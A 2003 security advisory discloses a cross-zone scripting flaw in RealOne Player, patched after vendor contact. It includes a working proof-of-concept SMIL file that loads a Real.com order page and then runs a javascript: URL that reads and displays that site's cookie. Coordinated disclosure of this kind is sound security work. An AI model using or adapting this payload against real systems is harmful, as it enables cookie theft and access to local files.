DigitalPranksters Security Advisory http://www.DigitalPranksters.com RealOne Player Allows Cross Zone and Domain Access Risk: High Product: RealOne Player (English only), RealOne Player v2 for Windows (all languages), and RealOne Enterprise Desktop (all versions, standalone and as configured by RealOne Desktop Manager). Product URL: http://www.real.com/realoneplayer.html Vendor Contacted: July 1, 2003 Vendor Released Patch: August 19, 2003 DigitalPranksters Public Advisory Released: August 27, 2003 Found by: KrazySnake (krazysnake@digitalpranksters.com) Problem: Using a SMIL presentation, an attacker can instruct the RealOne player to load a series of URLs. If the attacker specifies a scripting protocol as the URL, the script executes in the context of the previous URL. This allows the attacker access to everything the previous URL had access to. For example, an attacker could load a file on the local machine (C: drive) through the SMIL and then load script into the "my computer" zone to read content from the local hard disk. It also allows the attack to script web sites and steal cookies. We feel this is a high risk because there is no prompt before opening a SMIL file. This allows the attacker to open the maliciously created file without the victim's intent. We have identified several potential attack vectors. These include linking to the SMIL over HTTP through link (A HREF="malicious.smil"), javascript (document.location="malicious.smil"), and email attachments. Proof of concept: We have created a SMIL file that will read the cookie from https://order.real.com/pt/order.html. The cookie will be read 9 seconds after the audio has begun. Source Code: <smil xmlns="http://www.w3.org/2001/SMIL20/Language"; xmlns:rn="http://features.real.com/2001/SMIL20/Extensions";> <head> <meta name="title" content="DigitalPranksters.com Proof of Concept"/> <meta name="author" content="DigitalPranksters.com"/> <meta name="copyright" content="(c)2003 DigitalPranksters.com"/> </head> <body> <audio src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr";> <area href="https://order.real.com/pt/order.html"; begin="1s" external="true" actuate="onLoad" sourcePlaystate="play" rn:sendTo="_rpcontextwin"> <rn:param name="width" value="10"/> <rn:param name="height" value="10"/> </area> <area href="javascript:alert('Hi there! I\'m a digital prankster. I just read your cookie from ' + document.domain + ' over the ' + location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie + '\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad" sourcePlaystate="play" rn:sendTo="_rpcontextwin"/> </audio> </body> </smil> Resolution: RealNetworks released a security update to address this issue. The security update and details of this update from RealNetworks are available from http://service.real.com/help/faq/security/securityupdate_august2003.html. Greetings: Harmo and HTMLBCat. Thanks to RealNetworks for fixing this issue. Disclaimer: Standard disclaimer applies. The opinions expressed in this advisory are our own and not of any company. The information within this advisory may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
